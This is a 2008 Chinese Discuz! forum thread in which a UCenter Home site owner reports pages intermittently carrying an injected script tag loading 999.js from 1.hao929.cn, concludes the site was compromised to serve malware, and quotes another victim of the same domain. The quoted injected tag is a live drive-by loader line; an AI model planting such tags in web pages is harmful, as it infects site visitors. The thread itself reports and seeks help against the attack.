Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[不是BUG] uch时好时坏,可能有安全漏洞

[复制链接]
cd701 发表于 2008-4-24 22:04:41 | 显示全部楼层 |阅读模式
uch有时候打开正常,有时候打开看似连接不上CSS文件(dz ss都没问题),显示出现“屏蔽 doing” “album” 等等命令链接。 查看文件源代码表头有<script src=http://1.hao929.cn/999.js></script>,这个js是引用哪里的?怎么会蹦出个莫名其妙的hao929.cn?如果再仔细观察,在刷新时会闪出realplay播放器,但只是一闪而逝,非常奇怪。
备注:未改过程序。未上传影音文件。服务器为WINNT。其他都很稳定,昨天UCH也很稳定。

经查明,有人挂马导致。罪魁祸首就是1.hao929.cn
 楼主| cd701 发表于 2008-4-24 22:09:55 | 显示全部楼层
忘了说,在正常情况下文件源代码<script src=http://1.hao929.cn/999.js></script>是没有的。难道是我服务器问题?
回复

使用道具 举报

 楼主| cd701 发表于 2008-4-24 22:16:20 | 显示全部楼层
靠,刚才百度了一下,原来是有人想挂马!!估计UCH有ajax.js漏洞!

引用百度来的:
这个域名的主人请放我一马 hao929.cn
本人和朋友在珠海注册了一个公司 ,是做同城相约论坛的!流量每天不超过300,就是这个域名1.hao929.cn 整天挂马到我网站上!本来是拆掉了他留的后门,但不知道他又怎么进来的!

花了几千块钱在珠海最大的站(珠海视窗)上面做广告! 搞的公司4台电脑全中毒,现在每天最少挂三次马!我刚拆掉他挂的 他又马上有挂好!,

我真的怕了!大家出出主意我该怎么做才好!
回复

使用道具 举报

ie88 发表于 2008-4-24 23:31:19 | 显示全部楼层
如果你自己机器没中毒,就服务器问题?
回复

使用道具 举报

andy888 发表于 2008-4-25 09:53:16 | 显示全部楼层
你可以查一下服务器是否中毒了,看到消息先另删除联系我,我看一下你的问题
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-1-24 13:49 , Processed in 0.025049 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表